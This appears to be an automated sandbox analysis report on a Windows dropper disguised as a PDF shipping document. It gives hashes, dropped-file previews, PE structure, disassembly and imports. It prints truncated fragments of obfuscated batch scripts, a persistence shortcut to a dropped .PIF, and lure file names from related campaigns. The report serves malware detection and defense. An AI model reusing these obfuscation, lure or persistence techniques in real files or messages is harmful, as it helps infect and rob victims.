                                                                                                  SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                  Malicious:false
                                                                                                  Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                  C:\Users\Public\Libraries\Tizelcdh

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):615416
                                                                                                  Entropy (8bit):7.382983576749722
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:LBrzKRx9NcxYqoBJBP0i3IMn0h8OYRBl3VjUcSxxi1nHW8:lHKRvyxYqoBJBP/n0fYXvjUtxs1nZ
                                                                                                  MD5:E3FB2070B13A510150E11FF1D395FD8D
                                                                                                  SHA1:33C44A27F36FA78F5E4BDD640B700356BEC6DE2A
                                                                                                  SHA-256:2FE18E6EBE016409E31A310D3F81C0BABC1D20B7ABF97B45023C684B88154707
                                                                                                  SHA-512:CD2976E92DE2DBFD1EC9396AD8F8111D7B886A06E2C778DED437C229DAC680D91C14F90648BA23D38C712F6214F55C55B9380081B1504E4B2EFABB3CD0324E1A
                                                                                                  Malicious:true
                                                                                                  Preview:...Y#..K..&....%&.........&......%"'&....'..."&........%..%..."...#....Y#..K..'.......&...Y#..Khbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_h....ba\$.3Oo4..a..2..h.V5N.=.....-....)3.t7...*............L..R ..g.\...;G....o.....p...O...&.E....l...

                                                                                                  C:\Users\Public\Libraries\Tizelcdh.PIF

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1364480
                                                                                                  Entropy (8bit):7.0624436540736975
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:9dk7eYEWx0i5VTe5QCQBSt2jKasCr4LUkq0uHyC6q7KubU+7:90eYbSGUelD0uSC6q7bbU+
                                                                                                  MD5:09F4F91713BD6588465534822D5AD96C
                                                                                                  SHA1:3B6B69C8709AEA821D60248294D52E3CFEFECB23
                                                                                                  SHA-256:C8E0836B1E1EA4EE7486EB41994AE198CB5F60F460DC4CBEFBBABC186329855F
                                                                                                  SHA-512:8B6B9AD29F50A6E141C8A3033D0F668ABF63207497EC4A8BA469D5CE08A2AB9A93A06C66CC2E57E614A45D0E188EB0A6F5E94E578C3525C127A4E288A494A774
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................,...........H.......P....@..........................`...................@..............................V+...................................................................................................................text....!.......".................. ..`.itext.......@.......&.............. ..`.data....*...P...,...0..............@....bss.....7...........\...................idata..V+.......,...\..............@....tls....@................................rdata..............................@..@.reloc..............................@..B.rsrc................4..............@..@.............`......................@..@................................................................................................

                                                                                                  C:\Users\Public\Libraries\hdcleziT.pif

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):175800
                                                                                                  Entropy (8bit):6.631791793070417
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                  MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                  SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                  SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                  • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                  • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                                  • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                                                  • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                                                  • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                                                  • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                                                  • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                                                  • Filename: PO11550.exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                  C:\Users\Public\Tizelcdh.url

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Tizelcdh.PIF">), ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):104
                                                                                                  Entropy (8bit):5.124973646679898
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMQAIXsbxWcuANvn:HRYFVmTWDyzyIXExWcPNvn
                                                                                                  MD5:393C77C35C343511E59469F3F9A95E45
                                                                                                  SHA1:E8DFE1A90D319C075A79728E20549A523C86CC13
                                                                                                  SHA-256:28E7B705D25D2A9F2281BE39AE3D041BFA610896478871A3BE4E43EB56AE9694
                                                                                                  SHA-512:138537AA1728E9F15146AE2B53B6B9AAC834BE1610FAC46B028B02295ACBD7A5859E00FC574DFF00E29475889FF55958AA9D207FFE6D40284805F1ECBEC1B311
                                                                                                  Malicious:true
                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Tizelcdh.PIF"..IconIndex=934656..HotKey=74..

                                                                                                  C:\Users\Public\TizelcdhF.cmd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15789
                                                                                                  Entropy (8bit):4.658965888116939
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                  MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                  SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                  SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                  SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                  Malicious:false
                                                                                                  Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                  C:\Users\user\AppData\Local\Temp\0j0OId92L

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\proquota.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.0624436540736975
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 93.60%
                                                                                                  • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                                  • Windows Screen Saver (13104/52) 0.12%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  File name:Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5:09f4f91713bd6588465534822d5ad96c
                                                                                                  SHA1:3b6b69c8709aea821d60248294d52e3cfefecb23
                                                                                                  SHA256:c8e0836b1e1ea4ee7486eb41994ae198cb5f60f460dc4cbefbbabc186329855f
                                                                                                  SHA512:8b6b9ad29f50a6e141c8a3033d0f668abf63207497ec4a8ba469d5ce08a2ab9a93a06c66cc2e57e614a45d0e188eb0a6f5e94e578c3525c127a4e288a494a774
                                                                                                  SSDEEP:24576:9dk7eYEWx0i5VTe5QCQBSt2jKasCr4LUkq0uHyC6q7KubU+7:90eYbSGUelD0uSC6q7bbU+
                                                                                                  TLSH:EB55AE2DBE518873D13E1D794FCABAD2142EBE531D29DED663B50E2C4E393603825287
                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                  File Icon

                                                                                                  Icon Hash:8b2bdbcbe377361f

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4a4814
                                                                                                  Entrypoint Section:.itext
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:aff85430390d0615c71e66b14d9cd545

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFF0h
                                                                                                  push ebx
                                                                                                  mov eax, 004A2EC0h
                                                                                                  call 00007FD2F0A90D60h
                                                                                                  mov ebx, dword ptr [004A7858h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  call 00007FD2F0AF4083h
                                                                                                  mov ecx, dword ptr [004A764Ch]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [0049FE0Ch]
                                                                                                  call 00007FD2F0AF4088h
                                                                                                  mov ecx, dword ptr [004A78F0h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [004A2B08h]
                                                                                                  call 00007FD2F0AF4075h
                                                                                                  mov ecx, dword ptr [004A79B0h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [004A1F50h]
                                                                                                  call 00007FD2F0AF4062h
                                                                                                  mov ecx, dword ptr [004A7690h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [004A27E8h]
                                                                                                  call 00007FD2F0AF404Fh
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  call 00007FD2F0AF40C8h
                                                                                                  pop ebx
                                                                                                  call 00007FD2F0A8EA86h
                                                                                                  nop
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac0000x2b56.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x99e00.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb10000xa9a8.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xb00000x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xac8180x6b0.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000xa21180xa2200e74c913ec359d14f19f2e0206491ed56False0.5065852086545876data6.535130333377707IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .itext0xa40000x88c0xa002b7c8657795bffe278c3e9eea9302729False0.54296875data5.7007896228068695IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .data0xa50000x2a1c0x2c00c90dd31314dcbbcc2c3513dd910ecb9aFalse0.41060014204545453data4.209972713780321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .bss0xa80000x37140x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .idata0xac0000x2b560x2c00ef49943757421d602f9ae4727dfb4f2cFalse0.3165838068181818data5.166724466195998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .tls0xaf0000x400x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rdata0xb00000x180x20000113f4675e11f281d6309af00b17699False0.05078125data0.190488766434666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xb10000xa9a80xaa00edb9b5098fed26af445bbdf93ea19fd7False0.575390625data6.666923999952873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xbc0000x99e000x99e00b844e56e130e271d255180c509f5319dFalse0.5304090932168968data6.797506991881448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_CURSOR0xbcb640x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                  RT_CURSOR0xbcc980x134dataEnglishUnited States0.4642857142857143
                                                                                                  RT_CURSOR0xbcdcc0x134dataEnglishUnited States0.4805194805194805
                                                                                                  RT_CURSOR0xbcf000x134dataEnglishUnited States0.38311688311688313
                                                                                                  RT_CURSOR0xbd0340x134dataEnglishUnited States0.36038961038961037
                                                                                                  RT_CURSOR0xbd1680x134dataEnglishUnited States0.4090909090909091
                                                                                                  RT_CURSOR0xbd29c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                  RT_BITMAP0xbd3d00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                  RT_BITMAP0xbd5a00x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                  RT_BITMAP0xbd7840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                  RT_BITMAP0xbd9540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                  RT_BITMAP0xbdb240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                  RT_BITMAP0xbdcf40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                  RT_BITMAP0xbdec40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                  RT_BITMAP0xbe0940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                  RT_BITMAP0xbe2640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                  RT_BITMAP0xbe4340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                  RT_BITMAP0xbe6040x837e8Device independent bitmap graphic, 527 x 340 x 24, image size 538560, resolution 11811 x 11811 px/mEnglishUnited States0.5818306721128853
                                                                                                  RT_BITMAP0x141dec0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                  RT_ICON0x141ed40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 33364 x 33364 px/m0.4858156028368794
                                                                                                  RT_ICON0x14233c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 33364 x 33364 px/m0.17240663900414938
                                                                                                  RT_DIALOG0x1448e40x52data0.7682926829268293
                                                                                                  RT_DIALOG0x1449380x52data0.7560975609756098
                                                                                                  RT_STRING0x14498c0x1ecdata0.5670731707317073
                                                                                                  RT_STRING0x144b780x2fcdata0.4568062827225131
                                                                                                  RT_STRING0x144e740xb8data0.6793478260869565
                                                                                                  RT_STRING0x144f2c0xf8data0.6290322580645161
                                                                                                  RT_STRING0x1450240x248data0.4914383561643836
                                                                                                  RT_STRING0x14526c0x3d0data0.3770491803278688
                                                                                                  RT_STRING0x14563c0x38cdata0.40969162995594716
                                                                                                  RT_STRING0x1459c80x384data0.3877777777777778
                                                                                                  RT_STRING0x145d4c0x3f8data0.3661417322834646
                                                                                                  RT_STRING0x1461440xf4data0.5532786885245902
                                                                                                  RT_STRING0x1462380xc4data0.6275510204081632
                                                                                                  RT_STRING0x1462fc0x22cdata0.5017985611510791
                                                                                                  RT_STRING0x1465280x3acdata0.31063829787234043
                                                                                                  RT_STRING0x1468d40x38cdata0.3876651982378855
                                                                                                  RT_STRING0x146c600x2a4data0.4230769230769231
                                                                                                  RT_RCDATA0x146f040x10data1.5
                                                                                                  RT_RCDATA0x146f140x324data0.7052238805970149
                                                                                                  RT_RCDATA0x1472380xb5a5RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 HzEnglishUnited States0.17223285520741488
                                                                                                  RT_RCDATA0x1527e00x351aDelphi compiled form 'TMainForm'0.17882889510077976
                                                                                                  RT_GROUP_CURSOR0x155cfc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                  RT_GROUP_CURSOR0x155d100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                  RT_GROUP_CURSOR0x155d240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x155d380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x155d4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x155d600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_CURSOR0x155d740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                  RT_GROUP_ICON0x155d880x22data1.0588235294117647

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                  user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                  kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                  user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, 